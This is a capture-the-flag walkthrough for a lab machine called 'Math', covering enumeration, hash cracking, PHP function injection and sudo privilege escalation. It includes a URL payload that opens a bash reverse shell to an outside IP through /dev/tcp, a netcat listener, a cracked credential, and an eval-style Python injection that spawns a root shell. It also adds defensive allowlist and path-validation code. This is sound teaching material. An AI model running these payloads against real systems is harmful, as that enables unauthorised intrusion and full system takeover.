Math Writeup
Port Scanning

nmap -sV -sC -p- -v $IP --open -T 5


Only ports 22 (SSH) and 80 (HTTP) are open.


Enumeration

http://172.16.1.79


I tested SQL Injection and default credentials on this login page, but without success.

Fuzzing

ffuf -w /usr/share/seclists/Fuzzing/fuzz-Bo0oM.txt -u http://172.16.1.79/FUZZ -e .php,.txt,.log,.zip,.py -ic

File backup.zip was found.


After downloading it, we can see it contains the source code of the application.

A hardcoded password hash was found inside the source code.


I used John the Ripper to crack the hash.

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Credential: f4:1q2we

With that, we can log into the application.

The application is a website under development meant to help students solve math operations.


Code Review


If the page parameter is set and the value is math, we are redirected to /math.php.

Analyzing the math.php file, we can see we have control over the math operations that the application performs.


Function Injection

Knowing we control the parameters and the application lacks sanitization, we can exploit the function like this:

/math.php?operation=system&firstNum=id&secondNum=1
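The root cause above is that the application calls whatever function name arrives in the operation parameter. The fix a code reviewer would ask for is an allowlist: a fixed table of permitted operations plus numeric validation of both operands, so a request naming system (or passing a command string as a number) is refused before anything is called. The following is an added example written for this writeup, not the challenge's math.php; the parameter names operation, firstNum and secondNum come from the request above, and everything else (the operation names, the error type) is assumed.

```python
"""Allowlist dispatch for a user-selected arithmetic operation.

Added example, not the challenge's code. The vulnerable pattern on the page is
roughly: call the function named by the client on the client's two operands.
This version never looks a function up by user-supplied name; it only consults
a fixed dict, and it parses the operands as numbers first.
"""
import operator
from typing import Callable, Dict, Tuple, Union

# The only operations the endpoint may perform. A name that is not a key here
# (for example "system") is rejected instead of being resolved dynamically.
OPERATIONS: Dict[str, Callable[[float, float], float]] = {
    "add": operator.add,
    "sub": operator.sub,
    "mul": operator.mul,
    "div": operator.truediv,
}


class InvalidRequest(ValueError):
    """Raised when a request parameter fails validation."""


def parse_operand(raw) -> float:
    """Accept only values that parse as a number; 'id' or a shell command do not."""
    try:
        return float(raw)
    except (TypeError, ValueError):
        raise InvalidRequest(f"operand is not a number: {raw!r}") from None


def calculate(params: Dict[str, str]) -> float:
    """Handle the query parameters of the math endpoint (names taken from the request)."""
    op_name = params.get("operation", "")
    op = OPERATIONS.get(op_name)
    if op is None:
        raise InvalidRequest(f"unknown operation: {op_name!r}")
    a = parse_operand(params.get("firstNum"))
    b = parse_operand(params.get("secondNum"))
    if op is operator.truediv and b == 0:
        raise InvalidRequest("division by zero")
    return op(a, b)


def try_calculate(params: Dict[str, str]) -> Tuple[bool, Union[float, str]]:
    """Return (ok, result_or_error); the error string is what you would log for a rejected request."""
    try:
        return True, calculate(params)
    except InvalidRequest as exc:
        return False, str(exc)


if __name__ == "__main__":
    # Constructed sample requests: a legitimate one and the injection attempt from the writeup.
    print(try_calculate({"operation": "add", "firstNum": "2", "secondNum": "3"}))
    print(try_calculate({"operation": "system", "firstNum": "id", "secondNum": "1"}))
```

The rejected-request path returns a message rather than raising, so a web handler can answer 400 and write the offending operation name to its log; repeated unknown operation names from one client are the detection signal for this class of probing.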


Foothold

/math.php?operation=system&firstNum=bash -c 'exec bash -i &>/dev/tcp/10.0.31.150/1337 <&1'&secondNum=1

Note: Don’t forget to encode the payload.


nc -lnvp 1337


Privilege Escalation

Inside the /home/f4 directory, we can see a note revealing his password.


sudo -l


We can see the user is allowed to run the verify.py script as root without a password.

cat verify.py


Basically, the script reads a file and checks if it exists.

Knowing this, we’ll make it read the /bin/bash file, which will grant us root privileges on the machine.

__import__('os').system('/bin/bash')
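The writeup does not show verify.py's source, but the fact that the line above yields a root shell implies (an assumption, not something the page states) that the user-supplied "file name" is passed through eval() or exec() instead of being treated as a path. An existence check needs neither. The example below is added for this writeup and is not the challenge's verify.py: it treats the input strictly as a path, resolves it, and confines it to one allowed directory, so the same string is just a file name that does not exist. The base directory and the demo() helper are assumed.

```python
"""File-existence check that never evaluates its input.

Added example, not the challenge's verify.py. The input is handled only as a
path: it is joined to an allowed base directory, resolved (which collapses
'..' and follows symlinks), and checked to still lie inside that directory
before os-level existence is consulted.
"""
import tempfile
from pathlib import Path

BASE_DIR = Path("/var/verify")  # assumed: the only tree the tool is meant to inspect


def verify_path(user_input, base_dir: Path = BASE_DIR) -> bool:
    """Return True only if user_input names an existing regular file inside base_dir."""
    if not isinstance(user_input, str) or "\x00" in user_input:
        return False
    candidate = (base_dir / user_input).resolve()  # an absolute input replaces base_dir here...
    try:
        candidate.relative_to(base_dir.resolve())  # ...so this confinement check catches it
    except ValueError:
        return False  # escaped the allowed directory via '..', a symlink or an absolute path
    return candidate.is_file()


def demo() -> dict:
    """Run the check against constructed sample input in a throwaway directory."""
    base = Path(tempfile.mkdtemp(prefix="verify-demo-"))
    (base / "homework.txt").write_text("2+2\n")  # constructed sample file
    return {
        "existing": verify_path("homework.txt", base),
        "missing": verify_path("nothing.txt", base),
        # The expression from the writeup is now only a (non-existent) file name.
        "payload_as_path": verify_path("__import__('os').system('/bin/bash')", base),
        "traversal": verify_path("../../etc/passwd", base),
        "absolute": verify_path("/etc/passwd", base),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Removing eval() fixes the injection, but the sudo rule itself is the second finding: a script that takes user input should not be granted NOPASSWD root at all when the check it performs can run as an unprivileged user.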

Proof
